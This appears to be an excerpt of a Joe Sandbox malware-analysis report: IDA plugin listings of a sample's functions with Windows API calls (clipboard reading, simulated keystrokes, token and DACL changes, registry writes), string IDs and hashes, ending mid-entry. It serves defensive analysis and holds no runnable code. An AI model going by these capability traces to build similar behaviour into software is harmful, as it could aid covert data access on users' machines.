                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: bfb2561fdcece2a0de570c068e8870ec1230c446a945548f70af09cfd21078bb
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: E7310572A00516DFC718DF48E584A69F7B6FF59310B258AA5E409CB652DB30EDC1EBC0
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 018E2311
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: de27947ed80b7006617f9f5b8f3dfea5520b6b9554211d3b3e121448e277638f
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: 0FE09A7594010DAFDB00EFA4D54969E7BB5EF04301F1005A1FD05D6691DA309A549A62
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 018E2311
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: bec00c30b551d6ae08dcbc1e220d77b75665442dd1c98cebd0e8a9db1ea8b657
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: CAE0E67594010DDFDB00EFB4D54D69E7FF4EF04301F100561FD01D2281D6309E509A62
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F8CE50
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CE91
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F8CED6
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8CF00
                                    • SendMessageW.USER32 ref: 00F8CF29
                                    • _wcsncpy.LIBCMT ref: 00F8CFA1
                                    • GetKeyState.USER32(00000011), ref: 00F8CFC2
                                    • GetKeyState.USER32(00000009), ref: 00F8CFCF
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CFE5
                                    • GetKeyState.USER32(00000010), ref: 00F8CFEF
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8D018
                                    • SendMessageW.USER32 ref: 00F8D03F
                                    • SendMessageW.USER32(?,00001030,?,00F8B602), ref: 00F8D145
                                    • SetCapture.USER32(?), ref: 00F8D177
                                    • ClientToScreen.USER32(?,?), ref: 00F8D1DC
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F8D203
                                    • ReleaseCapture.USER32 ref: 00F8D20E
                                    • GetCursorPos.USER32(?), ref: 00F8D248
                                    • ScreenToClient.USER32(?,?), ref: 00F8D255
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8D2B1
                                    • SendMessageW.USER32 ref: 00F8D2DF
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D31C
                                    • SendMessageW.USER32 ref: 00F8D34B
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F8D36C
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F8D37B
                                    • GetCursorPos.USER32(?), ref: 00F8D39B
                                    • ScreenToClient.USER32(?,?), ref: 00F8D3A8
                                    • GetParent.USER32(?), ref: 00F8D3C8
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8D431
                                    • SendMessageW.USER32 ref: 00F8D462
                                    • ClientToScreen.USER32(?,?), ref: 00F8D4C0
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F8D4F0
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D51A
                                    • SendMessageW.USER32 ref: 00F8D53D
                                    • ClientToScreen.USER32(?,?), ref: 00F8D58F
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F8D5C3
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8D65F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 302779176-4164748364
                                    • Opcode ID: 91b5d427ab954b4984cf5211a8ca76bdc9e3d0c9926b6e27e9357965acf989b1
                                    • Instruction ID: 3d43dbc397b87562c92bce18548b2b7c216522c88b0ecbacd83f2b24042c2c11
                                    • Opcode Fuzzy Hash: 91b5d427ab954b4984cf5211a8ca76bdc9e3d0c9926b6e27e9357965acf989b1
                                    • Instruction Fuzzy Hash: 5942AF70604245AFD721EF28C888FEABBE5FF48324F14061DF695872E1D7319854EBA2
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F8873F
                                    Strings
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: 043cf0b5a187276e24a1afb35cb7bb41d8499c506a8f91033666bda44a5cc94f
                                    • Instruction ID: 94e23f13753670fd8fc417da093096c99e9619395619f3fa27dd1fcede23085f
                                    • Opcode Fuzzy Hash: 043cf0b5a187276e24a1afb35cb7bb41d8499c506a8f91033666bda44a5cc94f
                                    • Instruction Fuzzy Hash: DE12B071A00258AFEB24AF24CC49FEE7BB4EF45360F644129F515EB1A1EF748946EB10
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: _memmove$_memset
                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                    • API String ID: 1357608183-1798697756
                                    • Opcode ID: 973f858216b5d545364bb8b48c90841d17f63c39ce95f96d382688b969a03fbd
                                    • Instruction ID: 26007bd4831210bdcfdf6d5b4561606db8c35b2631cf16b156e609ff979dda01
                                    • Opcode Fuzzy Hash: 973f858216b5d545364bb8b48c90841d17f63c39ce95f96d382688b969a03fbd
                                    • Instruction Fuzzy Hash: A093A372E04215DBDB24CF58C8817EDB7B1FF48365F25816AEE45AB280E7709E85EB40
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?), ref: 00F04A3D
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F3DA8E
                                    • IsIconic.USER32(?), ref: 00F3DA97
                                    • ShowWindow.USER32(?,00000009), ref: 00F3DAA4
                                    • SetForegroundWindow.USER32(?), ref: 00F3DAAE
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F3DAC4
                                    • GetCurrentThreadId.KERNEL32 ref: 00F3DACB
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3DAD7
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3DAE8
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3DAF0
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F3DAF8
                                    • SetForegroundWindow.USER32(?), ref: 00F3DAFB
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB10
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB1B
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB25
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB2A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB33
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB38
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3DB42
                                    • keybd_event.USER32(00000012,00000000), ref: 00F3DB47
                                    • SetForegroundWindow.USER32(?), ref: 00F3DB4A
                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00F3DB71
                                    Strings
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 7e8402c7eef66440b1ed85ed18c0d27e7f0584823fe8e8442efe1ab815fc5f0a
                                    • Instruction ID: 859b7dae0bd4e4c1655a675f97ffd2786b1fb8dbd25e6573ac0ec1febd4c80df
                                    • Opcode Fuzzy Hash: 7e8402c7eef66440b1ed85ed18c0d27e7f0584823fe8e8442efe1ab815fc5f0a
                                    • Instruction Fuzzy Hash: 28315271A4031CBFEB216F619C49FBE7E6CEB44B60F154025FA05EA1D1D6B05911BBA0
                                    APIs
                                    • OpenClipboard.USER32(00F8F910), ref: 00F74284
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F74292
                                    • GetClipboardData.USER32(0000000D), ref: 00F7429A
                                    • CloseClipboard.USER32 ref: 00F742A6
                                    • GlobalFix.KERNEL32(00000000), ref: 00F742C2
                                    • CloseClipboard.USER32 ref: 00F742CC
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00F742E1
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00F742EE
                                    • GetClipboardData.USER32(00000001), ref: 00F742F6
                                    • GlobalFix.KERNEL32(00000000), ref: 00F74303
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00F74337
                                    • CloseClipboard.USER32 ref: 00F74447
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                                    • String ID:
                                    • API String ID: 941120096-0
                                    • Opcode ID: 823e9c7863be834db8f18e514034491326a86b5d6c8cc22411307f8964fc2464
                                    • Instruction ID: 43acf243da1250e6d8d9d3435b590902035f51d1dbab441591a0f71fdefd28db
                                    • Opcode Fuzzy Hash: 823e9c7863be834db8f18e514034491326a86b5d6c8cc22411307f8964fc2464
                                    • Instruction Fuzzy Hash: F3517171204305AFD701EF64DC85FBE77A8AB84B10F10452AF95AD21E2DB74A909BB63
                                    APIs
                                      • Part of subcall function 00F58CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F58D0D
                                      • Part of subcall function 00F58CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58D3A
                                      • Part of subcall function 00F58CC3: GetLastError.KERNEL32 ref: 00F58D47
                                    • _memset.LIBCMT ref: 00F5889B
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F588ED
                                    • CloseHandle.KERNEL32(?), ref: 00F588FE
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F58915
                                    • GetProcessWindowStation.USER32 ref: 00F5892E
                                    • SetProcessWindowStation.USER32(00000000), ref: 00F58938
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F58952
                                      • Part of subcall function 00F58713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58851), ref: 00F58728
                                      • Part of subcall function 00F58713: CloseHandle.KERNEL32(?,?,00F58851), ref: 00F5873A
                                    Strings
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: 9102f9daa5e760598665a840f81a3ef34ec630ba4b24060b058a2074412b5e1f
                                    • Instruction ID: 33f0d1010386f1e81dfb0c3811f924b2c914f231bb6b1a396333fa24d4c6af05
                                    • Opcode Fuzzy Hash: 9102f9daa5e760598665a840f81a3ef34ec630ba4b24060b058a2074412b5e1f
                                    • Instruction Fuzzy Hash: C1812B71D00209BFDF11DFA4DC45AEE7BB8EF04355F18416AFE10B6161DB398A1AAB60
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F6C9F8
                                    • FindClose.KERNEL32(00000000), ref: 00F6CA4C
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6CA71
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6CA88
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F6CAAF
                                    • __swprintf.LIBCMT ref: 00F6CAFB
                                    • __swprintf.LIBCMT ref: 00F6CB3E
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • __swprintf.LIBCMT ref: 00F6CB92
                                      • Part of subcall function 00F238D8: __woutput_l.LIBCMT ref: 00F23931
                                    • __swprintf.LIBCMT ref: 00F6CBE0
                                      • Part of subcall function 00F238D8: __flsbuf.LIBCMT ref: 00F23953
                                      • Part of subcall function 00F238D8: __flsbuf.LIBCMT ref: 00F2396B
                                    • __swprintf.LIBCMT ref: 00F6CC2F
                                    • __swprintf.LIBCMT ref: 00F6CC7E
                                    • __swprintf.LIBCMT ref: 00F6CCCD
                                    Strings
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 3953360268-2428617273
                                    • Opcode ID: aaf83713157e9255d732928bca3f909ea42f549ed5948036e372a6e3c6d029b8
                                    • Instruction ID: 3160d1bb22578a377314021086476303e2982e4ec100a7fa2c6da0911a7243a5
                                    • Opcode Fuzzy Hash: aaf83713157e9255d732928bca3f909ea42f549ed5948036e372a6e3c6d029b8
                                    • Instruction Fuzzy Hash: BDA121B2508305ABC710EBA4CC95DAFB7ECEF94700F404919F585C7192FA78DA48EB62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F6F221
                                    • _wcscmp.LIBCMT ref: 00F6F236
                                    • _wcscmp.LIBCMT ref: 00F6F24D
                                    • GetFileAttributesW.KERNEL32(?), ref: 00F6F25F
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F6F279
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F6F291
                                    • FindClose.KERNEL32(00000000), ref: 00F6F29C
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F2B8
                                    • _wcscmp.LIBCMT ref: 00F6F2DF
                                    • _wcscmp.LIBCMT ref: 00F6F2F6
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F308
                                    • SetCurrentDirectoryW.KERNEL32(00FBA5A0), ref: 00F6F326
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F330
                                    • FindClose.KERNEL32(00000000), ref: 00F6F33D
                                    • FindClose.KERNEL32(00000000), ref: 00F6F34F
                                    Strings
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 74cc76f9196a2f710ae1d9567b2bbd7630d8336c4d51c9fbeb2b0e60e71f20fc
                                    • Instruction ID: 13ba9d8b512106567f1983dc2568088bb1047595a286f4b0a76c216741320da3
                                    • Opcode Fuzzy Hash: 74cc76f9196a2f710ae1d9567b2bbd7630d8336c4d51c9fbeb2b0e60e71f20fc
                                    • Instruction Fuzzy Hash: 1131A076A0121D6EDF20DBB4EC59AEE77ACAF48370F144175E814D31A0EB34DA49AF60
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80BDE
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F8F910,00000000,?,00000000,?,?), ref: 00F80C4C
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F80C94
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F80D1D
                                    • RegCloseKey.ADVAPI32(?), ref: 00F8103D
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F8104A
                                    Strings
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 60be5d0429b19bcf7bdce00d179153a5f97a4aa78204148646067f6ac6c121c1
                                    • Instruction ID: 95e2ae2a69916fa35c7260d7f34ce1eccec4732b839c05926ff3ca3456c33471
                                    • Opcode Fuzzy Hash: 60be5d0429b19bcf7bdce00d179153a5f97a4aa78204148646067f6ac6c121c1
                                    • Instruction Fuzzy Hash: B902A0756046119FCB14EF18C881E6AB7E5FF88720F04855DF8899B3A2DB78EC45EB41
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • DragQueryPoint.SHELL32(?,?), ref: 00F8C917
                                      • Part of subcall function 00F8ADF1: ClientToScreen.USER32(?,?), ref: 00F8AE1A
                                      • Part of subcall function 00F8ADF1: GetWindowRect.USER32(?,?), ref: 00F8AE90
                                      • Part of subcall function 00F8ADF1: PtInRect.USER32(?,?,00F8C304), ref: 00F8AEA0
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F8C980
                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F8C98B
                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F8C9AE
                                    • _wcscat.LIBCMT ref: 00F8C9DE
                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F8C9F5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F8CA0E
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F8CA25
                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00F8CA47
                                    • DragFinish.SHELL32(?), ref: 00F8CA4E
                                    • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F8CB41
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                    • API String ID: 2166380349-3440237614
                                    • Opcode ID: ac78c01bf452dec2c745e2e6d4e706815c8de469859853b2f71d941125cc6d34
                                    • Instruction ID: a23445d6325dc7cc240fe4a8cfd5495f589d1642e87a976d219710b4b6cd3657
                                    • Opcode Fuzzy Hash: ac78c01bf452dec2c745e2e6d4e706815c8de469859853b2f71d941125cc6d34
                                    • Instruction Fuzzy Hash: AC616F71608305AFC701EF64DC85D9FBBE8EF88710F00091EF591971A1DB749A49EBA2
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F6F37E
                                    • _wcscmp.LIBCMT ref: 00F6F393
                                    • _wcscmp.LIBCMT ref: 00F6F3AA
                                      • Part of subcall function 00F645C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F645DC
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F6F3D9
                                    • FindClose.KERNEL32(00000000), ref: 00F6F3E4
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F400
                                    • _wcscmp.LIBCMT ref: 00F6F427
                                    • _wcscmp.LIBCMT ref: 00F6F43E
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F450
                                    • SetCurrentDirectoryW.KERNEL32(00FBA5A0), ref: 00F6F46E
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F478
                                    • FindClose.KERNEL32(00000000), ref: 00F6F485
                                    • FindClose.KERNEL32(00000000), ref: 00F6F497
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: 172cfd5569faa93fc6aa596f3804381d2ce5db77cd9f78680330c5f2c4013288
                                    • Instruction ID: 740d26d46a23eb2cd30eb142a1e5c74f1e2cfa55c1c312967a30f3940af39f3c
                                    • Opcode Fuzzy Hash: 172cfd5569faa93fc6aa596f3804381d2ce5db77cd9f78680330c5f2c4013288
                                    • Instruction Fuzzy Hash: C431A4729012196ECF10EBA4FC89AEE77AC9F49370F140175E850E21A0DB35DA48FB64
                                    APIs
                                      • Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F8C4EC
                                    • GetFocus.USER32 ref: 00F8C4FC
                                    • GetDlgCtrlID.USER32(00000000), ref: 00F8C507
                                    • _memset.LIBCMT ref: 00F8C632
                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00F8C65D
                                    • GetMenuItemCount.USER32(?), ref: 00F8C67D
                                    • GetMenuItemID.USER32(?,00000000), ref: 00F8C690
                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00F8C6C4
                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00F8C70C
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F8C744
                                    • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 00F8C779
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                    • String ID: 0
                                    • API String ID: 3616455698-4108050209
                                    • Opcode ID: 448f4fe239307c6e9495d638aa88d19fc8cda6b48c3aabefe7b041d79a1c5925
                                    • Instruction ID: 7a3044901355aba6e7c22378495530879220a4486ee32f9645eec76eaba59c18
                                    • Opcode Fuzzy Hash: 448f4fe239307c6e9495d638aa88d19fc8cda6b48c3aabefe7b041d79a1c5925
                                    • Instruction Fuzzy Hash: 64817B716083059FDB10EF24C985AABBBE8FF88324F14492DF99597291D730D905EBA2
                                    APIs
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F58766
                                      • Part of subcall function 00F5874A: GetLastError.KERNEL32(?,00F5822A,?,?,?), ref: 00F58770
                                      • Part of subcall function 00F5874A: GetProcessHeap.KERNEL32(00000008,?,?,00F5822A,?,?,?), ref: 00F5877F
                                      • Part of subcall function 00F5874A: RtlAllocateHeap.NTDLL(00000000,?,00F5822A), ref: 00F58786
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F5879D
                                      • Part of subcall function 00F587E7: GetProcessHeap.KERNEL32(00000008,00F58240,00000000,00000000,?,00F58240,?), ref: 00F587F3
                                      • Part of subcall function 00F587E7: RtlAllocateHeap.NTDLL(00000000,?,00F58240), ref: 00F587FA
                                      • Part of subcall function 00F587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F58240,?), ref: 00F5880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F5825B
                                    • _memset.LIBCMT ref: 00F58270
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F5828F
                                    • GetLengthSid.ADVAPI32(?), ref: 00F582A0
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F582DD
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F582F9
                                    • GetLengthSid.ADVAPI32(?), ref: 00F58316
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F58325
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F5832C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F5834D
                                    • CopySid.ADVAPI32(00000000), ref: 00F58354
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F58385
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F583AB
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F583BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
                                    • Instruction ID: 93a69b97023ea721898be01c0f3db8fe5c550e90383fcfc92988ec5500f96d43
